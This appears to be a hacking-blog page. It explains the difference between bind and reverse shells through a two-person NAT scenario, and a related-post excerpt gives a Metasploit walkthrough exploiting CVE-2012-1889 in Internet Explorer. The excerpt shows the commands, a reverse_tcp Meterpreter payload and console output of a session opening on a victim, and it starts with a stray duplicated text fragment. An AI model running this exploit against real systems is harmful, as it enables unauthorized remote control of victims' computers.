Let us see the basic differences between a bind shell and a reverse shell..
What is a Shell
A shell is a software that acts as a intermediary between user and the
kernel. It provides the user an interface which provides access to the
services of kernel.
Eg : Bash shell etc..
Code:
+-----------------+ _______________ +----------------+
| Aneesh | Behind NAT / / | Shabbir |
| With Private ip | ----> ----> / Internet /----> ----> | with Public IP |
+-----------------+ /______________/ +----------------+
Ok.. So in this scenario.. Aneesh has a computer connected to the
internet with a private ip..(no hosting) while Shabbir is connected to
the internet with a Public IP (Hosted)..It basically means Shabbir's
system can be accessed by any one connected on the internet but this
does'nt go for Aneesh.. Aneesh's system being behing the NAT cannot be
directly connected by other Machines on the internet..
Bind Shell
Lets suppose Shabbir has encountered some problem with his system and
need some help from Aneesh.. He simply binds his shell (cmd.exe or
/bin/bash) to a specific port and sends Aneesh its port no and other
details.. In this scenario Aneesh can simply connect to the Shabbir's
Machine and Get the Shell!!So in this case :-
Aneesh's End :-Connect to shabbir (Acts as a client)
Shabbir's End :-Listen for connections (listen / act as a server and bind his command shell on the network..)
Reverse Shell
Now lets suppose after some days Aneesh screwed up his system and now he
asks Shabbir for his help..But in this case the bind shell cannot be
used as 'Aneesh' doesn't have a Public IP and his system is not
available publicly!! Now to conquer this problem. Aneesh sends his
command prompt to Shabbir.. So , in this case :-
Aneesh's End :-Would bind his shell and send it to Shabbir through the network..(Connect)
Shabbir's End :-Listen for connections , Respond to them (listen / act as a server)
That's all for this article.. I hope the viewers like it..
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="https://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information. 
1 comments:
very clearly, thanks for sharing guys
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon